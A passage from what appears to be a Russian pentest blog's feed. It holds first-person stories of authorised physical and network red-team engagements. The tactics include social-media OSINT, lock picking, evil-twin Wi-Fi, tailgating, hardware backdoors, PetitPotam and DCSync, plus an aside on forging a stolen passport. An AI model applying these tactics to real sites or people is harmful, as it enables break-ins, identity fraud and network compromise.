    <img src="https://img4.teletype.in/files/f0/84/f084686c-80e4-4159-9835-74aeca71d5a2.png" width="696.1154855643045" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <figure id="EAuo" class="m_custom">
    <img src="https://img4.teletype.in/files/30/dd/30dd7166-f61d-4569-b7e6-5648a292cf6d.png" width="698" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <p id="c2Yf">На этом этапе мы понимали в кого слать фишинговое письмо (эти работы проходили параллельно с физикой), чтобы попасть в нужный сегмент, поскольку выяснили чем занимаются сотрудники и какие функции выполняют через беседу с HR. Эта информация еще нужна в случае, если нас выцепляют на территории, то мы можем бравировать нужными фамилиями и на крайний случай позвонить (Нагло? А почему бы и нет!), не сразу же авторизационное письмо подсовывать, нужно отыгрывать до конца. Еще как вариант в таких случаях - это попробовать скопировать на себя образ личности, которой мы хотим представится (может спасти на проходных, если вы проходите по чужому пропуску).</p>
  <p id="9KZz">Далее наше внимание было нацелено на соц сети, где мы нашли много фото с компрометирующей информацией, такой как фото документов, ключей и прочей полезной штуки. Также порадовали статьи на изместном ресурсе, где на фотках мы определили как выглядит предприятие изнутри. </p>
  <figure id="VYPq" class="m_custom">
    <img src="https://img3.teletype.in/files/2f/e0/2fe01a19-3fbb-4b51-95d1-98265f380305.png" width="710.2937576499388" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <p id="Mgnx">Для соблюдения профессионального тона мы на всякий случай сделали дубликат ключа, который обнаружили на фото из социальных сетей сотрудника (а вдруг подойдет). Как это я делал? Кидай вопрос в комменты, сделаю на Ютубе разбор на своем примере.</p>
  <figure id="hwwR" class="m_custom">
    <img src="https://img3.teletype.in/files/66/36/663623fb-5c74-42ea-ae64-0605875aa3f7.png" width="726.6292863762743" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <p id="jwhd">Не стоит также упускать из вида разные снимки и планы зданий из статей, карт, и прочего, например обзоры обновлений или презентация предприятий во время их открытия/реставрации на видео-площадках. Собственно мы такую возможность не упустили:</p>
  <figure id="6hq3" class="m_custom">
    <img src="https://img1.teletype.in/files/47/c8/47c86448-91f8-4380-9c05-d0d8ea31f6ea.png" width="750" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <p id="6esi">Для потенциальных работ по WIFI мы сделали карту точек доступа (в основном это делается сбора учеток, где мы пользуемся eaphammer в контексте атаки &quot;Злой двойник&quot;), но это уже относится к физической разведке (покататься на тачке вокруг или походить, тут как позволяет уже ситуация):</p>
  <figure id="BGYI" class="m_custom">
    <img src="https://img4.teletype.in/files/fa/78/fa780c1b-48ae-443c-b70b-a4b7e822a289.png" width="747.9999999999999" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <p id="aBPZ">Дальше как вы понимаете пришло время посмотреть замочки по контуру и лазы, которые могли оставить сотрудники предприятий самостоятельно (бывает такие вещи делают чтобы через проходную не выходить). В этом случае за вас уже продумали как выйти и не попасть под камеры и надзор охраны.</p>
  <figure id="dHnP" class="m_custom">
    <img src="https://img1.teletype.in/files/05/a2/05a29dd6-f45c-4455-a398-2a3474a0ead2.png" width="508.5" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <p id="PV7O">Замочки мы посмотрели, стандартный набор из навесных Apecs, которые отщелкиваются при помощи боготы на раз два, и английский профиль на внутренних калитках (через бинокль было не особо понятно что за фирма у замков).</p>
  <figure id="YTlA" class="m_custom">
    <img src="https://img3.teletype.in/files/62/4c/624cfc62-782c-4b1e-ac28-2d2b8989d060.png" width="656" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <p id="gYrz">Далее нам предстояло понять что с постом охраны, как часто они переключают камеры и в целом смотрят ли за ними. Сложилось ощущение, что ребят на этом проекте предупредили и они пялили в мониторы постоянно, как будто там интересная передача а не статичная картинка и еще что-то в моменте обсуждали.  Бдительные охранники даже жалюзи прикрыли, чтобы их не было видно. Но пока мой коллега ползал по периметру никто не реагировал и не менял свое поведение. Это могло только значить одно, камеры в автоматическом режиме не переключаются и не инициируются при помощи датчика движения. Окей, время обхода мы зафиксировали, теперь можно готовить рюкзаки и проверять на сколько наша аналитика верная. </p>
  <figure id="dpF0" class="m_custom">
    <img src="https://img2.teletype.in/files/db/64/db64d7c9-06e9-4c1c-a58a-4d03e70844d1.png" width="682.7319062181448" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <p id="lxGS">Собираясь в ночную смену, мы сложили свой стандартный инструмент, но ориентировались на высокую физическую активность, поэтому делали акцент только на максимально необходимых вещах, и размещали их в местах быстрой доступности (тут у меня возникла идея сделать удобные штуки для быстрого пользования инструментом, которые можно будет пристегивать к одежде, но это находится на проекте проектирования). Это картинка из интернета, тут под каждую задачу свой пак нужно собирать.</p>
  <figure id="oSBC" class="m_custom">
    <img src="https://img1.teletype.in/files/41/11/4111ef7b-0354-4715-b244-54d9b6cde53a.jpeg" width="730" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <figure id="mXbA" class="m_custom">
    <img src="https://img3.teletype.in/files/ae/c2/aec27a06-d526-4828-b018-be313050b4d1.png" width="608" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <p id="LBRL">Кстати теперь буду рекомендовать Multipick , поскольку это один из самых лучших инструментов в мире, заточенный под свои задачи. Это собака пролезет в самый кривой и тонкий профиль. Вообщем можно купить китайский инструмент, но в определенных кейсах, он может подвести.</p>
  <p id="MZ73">Теперь время повеселиться. GoPro на 1080 60 кадров в секунду и погнали. С ростом числа проектов адреналин для первого шага исчезает и мы с коллегами спокойно искали места, ранее разведанные для InitiaI Access. Самое банальное это заход через внешние пожарные лестницы, перекусываение проволоки забора (тут исключительно нужен качественный болторез, кусачки идут мимо), откручивание проф листа или вскрытие дверного замка. Кстати на этом проекте наши кусачки потерпели поражение. Мы выбрали самый быстрый способ и прошли первый контур.</p>
  <figure id="I6W0" class="m_original">
    <img src="https://img1.teletype.in/files/8b/94/8b94e066-a953-415d-9a6a-5bb9413f9cda.png" width="530" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <p id="GsX8">Прошу обратить внимание на картинку выше. Иногда замок заведомо переворачивают, поэтому такое можно увидеть на проектах и если нет тренировки работать снизу вверх клюшкой - могут возникнуть временные трудности в прямом смысле слова.</p>
  <p id="qHgE">Мы внутри. И тут уже пошел адреналинчик по венам, но в хорошем плане. В этот момент ты обычно чувствуешь небольшой холод (у меня лично по спине) и включается в голове умеренная тревожность, обостряется слух и зрение. В этот момент нужно быстро решить что делать дальше, мы принялись искать место, которое максимально близко было к нашей цели и имело конструктивные особенности, позволяющие забраться альтернативным способом в целевое помещение.</p>
  <figure id="0dOc" class="m_custom">
    <img src="https://img2.teletype.in/files/1a/54/1a54e097-09fe-4e2e-bc43-7ec73a96b2be.png" width="702" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <p id="6xOQ">Многие из вас, кто меня начал недавно смотреть/читать могут озадачится вопросом: чего за конструктивные особенности? Тут я подразумеваю строительные леса, пожарные лестницы, переходы между корпусами, открытые окна на досягаемых этажах, строительные элементы из бетона и тому подобное, что поможет достигнуть поставленной цели. Стоит упомянуть что пожарные лестницы бывают достаточно удобными, а не те, которые висят на 5 этажных жилых домах, хотя и такие встречаются.</p>
  <figure id="3Rlp" class="m_original">
    <img src="https://img1.teletype.in/files/c2/16/c216f31d-c675-4954-93a9-b4ccf6842467.png" width="600" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <p id="eh63">Кто-то у нас подпер брусочком запасную дверь (большое спасибо). Отмычки уже устали отдыхать. Внутри мы нашли план помещения (стандартная пожарка, которая обязана быть), зафиксировали ее и пошли к нашей цели. На пути мы столкнулись с перфорированными замками фирмы Dorma, которые открылись достаточно быстро, и мы попали в блок управления с резевным питанием. Ну тут особо для нас не было ничего интересеного, поэтому мы пошли дальше. Далее были серверные, которые с одной стороны помещения закрыты на СКУД, а с другой был перфорированный замок, который идет в комплекте с дверями-консервами. Такую дверь за минутку мы победили и попали в нужный нам блок где была цель. Там мы повтыкались с ноута к портам (искали рабочие), потом обнаружили в одной из комнат, которые также были закрыты принтер и там через манипуляцию обхода портсека протестирорвали подключение ноута к внешнему серверу, а потом и малинку воткнули. А как мы попали в эту замечательную дверь? В одном из помещений была обнаружена на стене доска из пробкового дерева, на которой был закреплен пропуск (спасибо большое), тут в игру идет флиппер и забирает метку себе в память. </p>
  <figure id="NhxA" class="m_custom">
    <img src="https://img2.teletype.in/files/55/4c/554cb0cf-5aa0-4667-be43-588cd1b708df.png" width="710.6007802340703" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <p id="IdDk">На этом этапе нам осталось надежно спрятать малинку с роутером и уйти. Тут кто как прячет, кто-то в сетевые фильтры, кто-то в роутеры, кто-то в щитки, короче полет фантазии.</p>
  <figure id="VHME" class="m_custom">
    <img src="https://img3.teletype.in/files/2f/66/2f6630ae-9986-4e1a-a063-ceb6cf6c8c99.png" width="709" />
    <figcaption>Картинка из интеренета и никакого отношения к проекту не имеет как и все остальные</figcaption>
  </figure>
  <p id="uEbg">Мы успешно ушли тем же путем и в целом все прошло тихо, но на следующий день нас попросили провернуть эту манипуляцию днем. Мы на самом деле уже заведомо шли &quot;на убой&quot;. Ну а какие варианты? Про нас уже наверняка знают, камеры посмотрели, хотя Заказчик убеждал в обратном. Но как говорится мы танцуем вы платите. Пошли днем, была куча народу, щеголяющая по предприятию, мы нашли коптерку с желтыми жилетами, в которые сразу вкинулись. Вуаля, мы подрядчики, а не хакеры, провернули туже операцию номинально, но уже днем. Засняли красивое кино с нескольких камер и отдали довольному заказчику. С отчетом как всегда пришлось повозиться, поскольку видео с камер и с экшен камер бывает недостаточно. В целом заказ выполнили, заработали репутацию и денег. Хочу подметить что я не описывал часть, где мы ломали внутряк, внешку или делали социалку, поскольку там каких-то рокет сайнс цепочек не было (все по стандарту). Спасибо дорогой заказчик что выбрал лучших среди профессионалов, надеемся на дальнейшие совместные проекты и тесное сотрудничество. Если вы придете к нам по рекомендации, обязательно это укажите (и от кого), поскольку для своих у нас есть определенные бенефиты.</p>
  <p id="3gdU"><strong>Ещё больше интересного в моем ТГ канале: <a href="https://t.me/pro_pentest" target="_blank">https://t.me/pro_pentest</a></strong></p>
  <p id="rLFF"><strong>А также на YouTube канале: <a href="https://www.youtube.com/@pro_pentest" target="_blank">https://www.youtube.com/@pro_pentest</a></strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@propentest/V1cnGQV9eKM</guid><link>https://teletype.in/@propentest/V1cnGQV9eKM?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest</link><comments>https://teletype.in/@propentest/V1cnGQV9eKM?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest#comments</comments><dc:creator>propentest</dc:creator><title>Взлом промышленного предприятия</title><pubDate>Wed, 30 Oct 2024 19:59:34 GMT</pubDate><media:content medium="image" url="https://img2.teletype.in/files/9e/7b/9e7b9683-60e8-4cdb-a6b0-fb6422a66938.png"></media:content><description><![CDATA[<img src="https://img3.teletype.in/files/2c/23/2c23b825-b697-46d3-92cc-123c00ad116d.png"></img>Всем привет! Давно не было историй. В этот раз речь пойдет об очень интересном проекте, который я не могу расписать в красках, поскольку он под жестким NDA, поэтому все события и участники были изменены, и все совпадения являются случайными.]]></description><content:encoded><![CDATA[
  <figure id="5m4U" class="m_custom">
    <img src="https://img3.teletype.in/files/2c/23/2c23b825-b697-46d3-92cc-123c00ad116d.png" width="540" />
  </figure>
  <p id="BDBh">Всем привет! Давно не было историй. В этот раз речь пойдет об очень интересном проекте, который я не могу расписать в красках, поскольку он под жестким NDA, поэтому все события и участники были изменены, и все совпадения являются случайными.</p>
  <p id="vADe"><strong>Хочу подчеркнуть, что информация, которую вы получите после прочтения статьи, носит исключительно обучающий характер, не является призывом к действию и не может использоваться в злонамеренных целях. Моя цель — показать недочеты и уязвимости, которые необходимо устранить ИБ-специалистам в их организациях.</strong></p>
  <p id="DWvt">Итак, начнем. Поступил нетиповой запрос от крупной компании на проверку по модели Red Team. В рамках этих работ было несколько команд:</p>
  <p id="W3GR">1) Координаторы</p>
  <p id="sOBK">2) Потрошители внешки</p>
  <p id="5Wnh">3) Support C2</p>
  <p id="unV3">4) &quot;Физики&quot;</p>
  <p id="0DuS">5) Ответственные лица со стороны Заказчика</p>
  <p id="HKbn">В контексте этого проекта моя роль заключалась в &quot;лидировании&quot; проекта и непосредственном участии.</p>
  <p id="d9kp">С ролями разобрались, теперь к сути. Задача — сломать Заказчика любым способом с учетом противодействия. Наша миссия в этом проекте имела приличный вес, поскольку требовалось продемонстрировать все возможные векторы атаки.</p>
  <figure id="cAPr" class="m_custom">
    <img src="https://img2.teletype.in/files/58/4e/584e51fb-d037-4304-9d27-1f41e7edb814.png" width="550" />
  </figure>
  <p id="xE8A">Я буду рассказывать про работы команды &quot;физиков&quot;. Заказчик обозначил цель — штаб-квартира и стратегический объект со складами и технологическими ресурсами.</p>
  <p id="NYlD">Первым делом мы начали прорабатывать часть, связанную с OSINT. Информация, полученная на этом этапе, очень сильно помогла в планировании работ, подготовке оборудования и расчете трудозатрат.</p>
  <p id="2gsw">Настало время подготовки оборудования. Поскольку векторов в буквальном смысле было очень много, нам пришлось везти с собой на объекты четыре 120-литровых чемодана и шесть рюкзаков, не считая небольших сумок. Помимо железа, снаряжения и инструментов, мы подготовили пакет документов в виде нескольких договоров на проведение работ, а также авторизационных писем (в этом плане всегда рекомендую прогонять документы через юристов, чтобы не выстрелить себе в ногу).</p>
  <figure id="xYNP" class="m_custom">
    <img src="https://img2.teletype.in/files/d2/11/d2111218-d518-4a1e-9226-3517c59c562f.png" width="583" />
  </figure>
  <p id="u9Zp">Еще один неотъемлемый момент заключался в подготовке техники для фото- и видеофиксации. Почему это так важно? В экстремальных условиях будет крайне неудобно и сложно пользоваться смартфоном. Представьте: вы стоите одной ногой на выступе 5 см, под вами 20 метров пустоты, и вы вскрываете дверцу в щитовую. Думаю, вряд ли захочется фиксировать свои действия с учетом большого риска сорваться вниз. А любое упущенное доказательство компрометации очень сложно подтвердить на этапе написания отчета. Поэтому — экшн-камера! Выбор моей команды и мой — это GoPro с креплениями PGYTECH. Кстати, крепления сделаны как прищепки с замком на лямку рюкзака, а вместо болтика-фиксатора используется быстросъемный зажим (очень удобно и быстро можно поменять батареи в камере).</p>
  <figure id="byQy" class="m_custom">
    <img src="https://img1.teletype.in/files/cf/18/cf18c1d3-ed7a-465d-85ff-b5ff9683c45d.png" width="540" />
  </figure>
  <p id="wXSR"><strong>Приблизительный список того, что мы взяли с собой:</strong></p>
  <p id="BfN5"><strong>Техника:</strong></p>
  <p id="AcYX">- Ноутбуки: MSI, MacBook, MSI для HackRF</p>
  <p id="Mdxg">- Raspberry Pi: 4B (1 шт.), Pi Zero (2 шт.)</p>
  <p id="g01x">- GoPro + крепления, аккумуляторы (4 шт.)</p>
  <p id="mE0c">- Flipper + модули</p>
  <p id="VhLh">- Proxmark (3 шт.)</p>
  <p id="Nykh">- HackRF + антенны (2 шт.)</p>
  <p id="fFKs">- Alfa: большая и маленькая с антеннами</p>
  <p id="aIA7">- Рации с антеннами (2 шт.)</p>
  <p id="O0b0">- Модем</p>
  <p id="niwB"><strong>Зарядные устройства:</strong></p>
  <p id="eMUF">- Зарядки для ноутбуков (3 шт.)</p>
  <p id="CQPe">- Зарядки для раций (2 шт.)</p>
  <p id="4NTo">- Powerbank: большой (20000 mAh) и малый</p>
  <p id="vk0f"><strong>Инструменты:</strong></p>
  <p id="VBJk">- Паяльник + припой</p>
  <p id="vPya">- Пассатижи</p>
  <p id="1ALU">- Отмычки (комплекты: английский, перфорационный, сувальдный, самоимпрессия)</p>
  <p id="UJmh">- Фонари: обычный и налобный, а также для замочных скважин</p>
  <p id="cecz"><strong>Сетевое оборудование:</strong></p>
  <p id="i9ls">- Патч-корды</p>
  <p id="Wc95">- Type-A - Ethernet переходник</p>
  <p id="9Ymq">- SD-card reader</p>
  <p id="kHWb"><strong>USB-устройства:</strong></p>
  <p id="pf20">- BadUSB Cactus + корпуса (15 шт.)</p>
  <p id="kDRy">- Обычные флешки</p>
  <p id="TJqz">- Live CD</p>
  <p id="9iTI"><strong>Снаряжение:</strong></p>
  <p id="F0kb">- Промальп-снаряжение</p>
  <p id="tlWc">- Балаклава</p>
  <p id="ohP7">- Перчатки (5 пар)</p>
  <p id="bxps"><strong>Документы:</strong></p>
  <p id="LMBx">- Паспорта</p>
  <p id="gkyj">- Удостоверения (промальп)</p>
  <p id="7VLW">- Документы по проекту (договор, авторизационные письма)</p>
  <p id="jcbu">- Мерч атакуемой компании</p>
  <p id="pWrk"><strong>Расходники:</strong></p>
  <p id="nHwW">- Армированная изолента</p>
  <p id="nAkG">- Двусторонний скотч</p>
  <p id="vByt">Следующий этап заключался в формировании плана работ - что за чем следует, в каком порядке будем проводить разведку и этапы реализации атаки. В наших проектах есть интересная особенность мы можем днями и неделями проводить наблюдение за объектом, а можем поймать уязвимый момент и воспользоваться вектором мгновенно. Мы с командой наметили точки входа на основании GEOINTа, проведенного на предыдущем этапе. Но как это бывает в большинстве случаев окружение объекта поменялось, вектора пропали, и нужно было все планировать по новой.</p>
  <figure id="4JjX" class="m_custom">
    <img src="https://img1.teletype.in/files/49/38/49387258-9a75-47a3-a6cb-4b596dd772e2.png" width="595" />
  </figure>
  <p id="gOSi">Далее наступает этап разведки/совершения активных действий. Как я описывал ранее данный этап сложно вынести в отдельный, потому что он может быть выполнен одновременно с проведением атаки. На данном этапе мы достаточно спокойно себя вели, обследовали территорию того объекта, который стоял по плану. Прикольно было получать снимки спящих охранников, или видеостену, которая просвечивалась ночью. К сожалению фото через монокль не получались достаточно качественными, чтобы идентифицировать что происходит на экране, но мы прекрасно понимали сколько камер одновременно доступны для просмотра.</p>
  <figure id="G0Rn" class="m_custom">
    <img src="https://img2.teletype.in/files/18/b6/18b6d46c-7f74-4bef-a600-f38df8b52ed5.png" width="584" />
  </figure>
  <p id="a5Mt">Для более гибкой коммуникации мы использовали рации с гарнитурой для поддержания непрерывной связи, потому что наша группа разбивалась и работала парами. На протяжении всего этапа мы записывали маршруты, время пересменки, привычки и особенности у охраны. Мы получили много полезной информации, которая нам помогла в дальнейших действиях.</p>
  <figure id="tHVw" class="m_custom">
    <img src="https://img1.teletype.in/files/8b/c9/8bc93bd3-4507-47e0-8a46-6774d0a86358.png" width="583" />
  </figure>
  <p id="mCbN">Настало время активных действий. Мы наметили вектора, выяснили, когда и как нам лучше проникать. Короче с трудом мы вскрыли на периметре дверь с английским профилем, к сожалению, очень трудно это было сделать китайским инструментом, он просто еле пролазил, тут бы не помешал Multipick. Передвижение по периметру было в спокойной форме. Бег по территории мог вызвать подозрение. Поскольку мы работали в парах, наши коллеги остались за периметром в ожидании команды использовать свой вектор для преодоления внешнего контура. Но был очень большой риск раскрытия, поэтому ребята докладывали обстановку снаружи. Мы проникли во все точки, которые были под защитой механических замков (видимо стоял дешевый Китай, открывались очень быстро). На этом этапе мы зафиксировали все критические узлы, на которые можно было воздействовать и отправились к основным целям.</p>
  <p id="6UlT">Далее нам удалось завладеть пропуском в ходе изучения зданий внутри их периметра. Мы обычно составляем план помещений при помощи magic plan, но тут не было такой необходимости, планы висели на стене.</p>
  <figure id="4wvp" class="m_custom">
    <img src="https://img3.teletype.in/files/64/92/64925b96-1db6-48c9-baef-0c1935335bfe.png" width="593" />
  </figure>
  <p id="zO7F">На следующим этапе мы с коллегой разделились - он пошел выставлять аппаратный бэкдор.</p>
  <figure id="DS6e" class="m_custom">
    <img src="https://img1.teletype.in/files/0e/b5/0eb5fd5f-3ba9-42f7-b531-eab9c2199eae.png" width="566" />
  </figure>
  <p id="i6OS">А я пошел вскрывать серверные комнаты, да тут конечно и СКУД был, но присутствовали двери с перфо-профилем, которые вели также к цели. Не скажу что первая дверь далась быстро (использовал технику прочеса), но последующие открывались достаточно хорошо, с условием использования попинового прожатия (в среднем уходило 20 секунд на вскрытие). Но были двери с интересной англией и туда мой инструмент просто не мог протиснуться (такие двери остались неоткрытыми).</p>
  <figure id="KFul" class="m_custom">
    <img src="https://img1.teletype.in/files/01/e0/01e0d1ea-941f-40d0-8f71-816ddeb22e40.png" width="618" />
  </figure>
  <p id="BstM">После выполнения всех намеченных действий, мы эвакуировались к нашей группе.</p>
  <figure id="diDC" class="m_custom">
    <img src="https://img2.teletype.in/files/53/bc/53bc515b-620c-434c-834b-738a44d3087c.png" width="640" />
  </figure>
  <p id="mTAP">Нам предстояло посетить в этом же городе штаб-квартиру, где преследовалась таже цель - проникновение и закрепление через аппаратный бэкдор. На этом этапе нам удалось обойтись без пропуска. Мы позвонили в соседствующую организацию бизнес-центра &quot;А&quot; и представились клиентами, которые хотят очно обсудить условия сотрудничества. На ресепшен нам выдали пропуска и таким образом мы преодолели первый контур. На этаже нас ожидал СКУД, который стоял номинально, поскольку используя атаку tailgating мы зашли в холл, и последовали на кухню, чтобы послушать о чем говорят сотрудники и сформировать действия.</p>
  <figure id="DIWs" class="m_custom">
    <img src="https://img2.teletype.in/files/99/da/99da4cbe-66be-48bb-82f3-186fb7523e5d.png" width="651" />
  </figure>
  <p id="vcfV">Зрительно мы прикинули куда можно зайти чтобы воткнуться в сетевую розетку и практически сразу же пошли социалить сотрудников. Прикинувшись саппортом мы воткнулись вместо принтера в сеть. Проверили, что команде по поддержке C2 пришел отстук и ретировались в поисках дополнительной точки подключения. Второе подключение сделали за панелью потолка и выставили наблюдение по портативным камерам. На этом наша работа в этом контуре была завершена, ребята начали аккуратно пролезать в инфраструктуру, а мы поехали собирать драфт отчета о проделанной работе (и конечно же монтировать кино – такой экшен нравится всем).</p>
  <figure id="SUzd" class="m_custom">
    <img src="https://img2.teletype.in/files/1b/35/1b350bab-4383-4f4f-b5f5-56c49ce6b521.png" width="548" />
  </figure>
  <p id="SxSw">По итогу Заказчика расковыряли как снаружи, так и изнутри. Заказчику было интересно поработать с нами и провести такой детальный и подробнейший аудит безопасности, в ходе которого были обнаружены интересные уязвимости веба снаружи периметра и типовые уязвимости внутри инфраструктуры. На Взлом компании со всех сторон ушло около 7 часов, полное завершение этапа анализа защищенности произошло по окончанию 10 дней. На этом этапе, мы с командой повторно выехали к заказчику и в сопровождении провели полный аудит физической безопасности.</p>
  <p id="B4pE">Надеюсь вам понравилось, спасибо за внимание!</p>
  <p id="UJA0"><strong>Ещё больше интересного в моем ТГ канале: <a href="https://t.me/pro_pentest" target="_blank">https://t.me/pro_pentest</a></strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@propentest/T3LxWSSywXO</guid><link>https://teletype.in/@propentest/T3LxWSSywXO?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest</link><comments>https://teletype.in/@propentest/T3LxWSSywXO?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=propentest#comments</comments><dc:creator>propentest</dc:creator><title>Взлом в отрасли Энергетики</title><pubDate>Wed, 05 Jun 2024 13:54:08 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/bf/af/bfafa07b-4466-4388-ad85-02afa586a811.png"></media:content><description><![CDATA[<img src="https://img2.teletype.in/files/d9/f9/d9f957e9-3149-4c96-9290-0b9a2882b712.png"></img>Всем привет! Давно не было статеек, все руки тянутся перевести контент в видео формат, который и послушать можно и посмотреть на фоне. Если вы кстати не против, напишите в комментарии.]]></description><content:encoded><![CDATA[
  <figure id="9OWl" class="m_custom">
    <img src="https://img2.teletype.in/files/d9/f9/d9f957e9-3149-4c96-9290-0b9a2882b712.png" width="580" />
  </figure>
  <p id="3Pwl"><em>Всем привет! Давно не было статеек, все руки тянутся перевести контент в видео формат, который и послушать можно и посмотреть на фоне. Если вы кстати не против, напишите в комментарии.</em></p>
  <p id="72iV"><strong>Сегодня речь пойдет про взлом компании в отрасли энергетики. </strong></p>
  <h2 id="V1Ig">День Х. </h2>
  <p id="Dgar">На объекте стояла замечательный терминал по выдаче пропусков</p>
  <figure id="RssI" class="m_custom">
    <img src="https://img3.teletype.in/files/66/84/66845491-a143-4131-8705-1f2b9d9f6217.png" width="475" />
  </figure>
  <p id="5e56">Если вы не знакомы с такой системой то вкратце для получения временного пропуска ваши данные заносят в систему. По прибытию на объект в специальном терминале сканируется паспорт и выдается пластиковая карта. В случае с постоянным пропуском вы можете стянуть паспорт таргета, сдлеать его в хорошем качестве (либо нейронки либо фотошоп в помощь) и зайти под ним, как легальный сотрудник. </p>
  <h2 id="1jYN">OSINT</h2>
  <p id="5QIc">Если вы не сталкивались с документами наизнанку в социальных сетях, то советую поресерчить в этом направлении. Хотя в свое время знакомые осинтеры мне показывали целые базы с паспортами, снилсами, страховками и прочими документами. Короче кто ищет - тот всегда найдет.</p>
  <p id="klB6">Вот простой пример такой находки - чувак решил поделиться радостной новостью о приобритении новой машины:</p>
  <figure id="LtXz" class="m_custom">
    <img src="https://img4.teletype.in/files/37/a0/37a0c95a-4099-4275-a1e0-bdefaf48863e.png" width="502" />
  </figure>
  <p id="uanZ">Отвлекаясь от темы документов и опираясь на тему находок, обнаружил как-то в гостевой зоне ключ со дня открытия, которой затесался на ряду с корпоративными фотками. (Отмычки не панацея. Внимательность - ключ ко всем дверям) Хотя на самом деле и рисунок ключа не сильно сложный :)</p>
  <figure id="uTfY" class="m_custom">
    <img src="https://img4.teletype.in/files/7b/4e/7b4e820e-7e28-43d9-a293-c5a5a012b774.png" width="444.00000000000006" />
  </figure>
  <h2 id="Ra6W">Bypass терминала СКУД</h2>
  <p id="cDiR">Так я немного отвлекся. Короче терминал, паспорт пропуск. Коллеги, если у вас стоит такая штука - то не факт что к вам пройти нельзя. Да, она защищает от копирования/кражи пропуска на улице или в общественном транспорте, но не лишает возможности пойти более сложным путем и заполучить заветную карту.</p>
  <figure id="V9eE" class="m_original">
    <img src="https://img3.teletype.in/files/6d/17/6d178654-5935-4b07-8ecd-3b62656be95d.png" width="319" />
  </figure>
  <p id="53F5">На этапе проверки была получена обычная HID карточка (скан паспорта внутреннего сотрудника с экрана смартфона), теперь задача пройти сам СКУД. Там был установлен экран куда сотрудники смотрели перед тем, как разблокируется вертушка. Оказывается это был &quot;градусник&quot; - поэтому тут без проблем. </p>
  <h2 id="rxx8">Initial Access</h2>
  <p id="rB5f">Дальше задачей было найти укромное место, где можно было ткнуться в сетевую розетку. Обычно такие места располагаются в опенспейсах, где сотрудники могли не выйти на работу в силу своего гибридного графика.</p>
  <p id="OBbY">Было найдено такое место рядом с принтером.</p>
  <figure id="1d6V" class="m_custom">
    <img src="https://img2.teletype.in/files/d0/44/d0440263-0b5b-4dbe-b552-dafc0da0f379.png" width="691" />
  </figure>
  <p id="g8f0">Далее нужно было обойти портсек, но и этого не потребовалось, сетевая розетка была доступна для работы из &quot;коробки&quot;.</p>
  <h2 id="ZGtq">Внутряк - настало твое время!</h2>
  <p id="q0wz">Начинается стандартные процедуры по обследованию сети. Black box подразумевает ручной лут учеток. Но к сожалению данные действия не привели исполнителя к положительному результату. Но тильтовать рано впереди еще много проверок без наличия УЗ. Пока сеть стояла на сканировании, исполнитель пошел искать доступные способы стиллинга учетных записей. Откуда? Правильно! Надо найти чей-нибудь рабочий ПК и стянуть хешики из SAM, SYSTEM, SECURITY (вдруг повезет и заваляются креды Админа). Короче был найден ПК, но обойти BIOS не удалось. Были еще рабочие станции в кабинете, но там существовала необходимость применять слесарный инструмент.</p>
  <figure id="diWY" class="m_custom">
    <img src="https://img3.teletype.in/files/20/60/20609f1b-d539-4241-84a4-dc02c4bb6779.png" width="507" />
  </figure>
  <p id="WKCi">По пути наименьшего сопротивления возвращаемся обратно. Скан закончен, самое время запулить в метасплоит результаты скана и выполнить базовые проверки при помощи модулей. Ряд проверок был опущен в виду того, что была вероятность заполучить быстро креды. Но в упреждение работы с msf (как правило - это может затянуться в большой инфре), исполнитель начал работать по &quot;низко висящим фруктам&quot; и обнаружил <strong>netntlmv1 хешик</strong>, когда дернул PetitPotam. Ура! Даже <strong>ESC8</strong> не пришлось применять :D </p>
  <figure id="5qtE" class="m_custom">
    <img src="https://img1.teletype.in/files/84/1d/841d05a7-42c8-41a2-a7d2-6ae18901f387.png" width="731" />
  </figure>
  <p id="cx82">На этом этапе была выставлена аппаратная закладка в виде &quot;Малинки&quot;, прописаны маршруты и покинуто место проведения работ.</p>
  <figure id="BsTT" class="m_original">
    <img src="https://img4.teletype.in/files/f2/0f/f20f21a7-bbbf-4952-9941-278d3e3fff77.png" width="580" />
  </figure>
  <h2 id="40m1">Удаленка</h2>
  <p id="lAxQ">Теперь работы стало возможно выполнять с дедика, тоже небольшое достижение. Хэш отправился на брут после чего ничего не получилось :( Потому что пароль протух. Повторная операция  &quot;<strong>Петит потам спешит на помощь!</strong>&quot; была выполнена успешно и теперь настало время атаки DCSync. Получены хешики, но задача была не просто взять домен, но и заползти в технологический сегмент. Тут в здание врывается собака и помогает найти админов с их тачками, где был доступ по второму сетевому интерфейсу вглубь.</p>
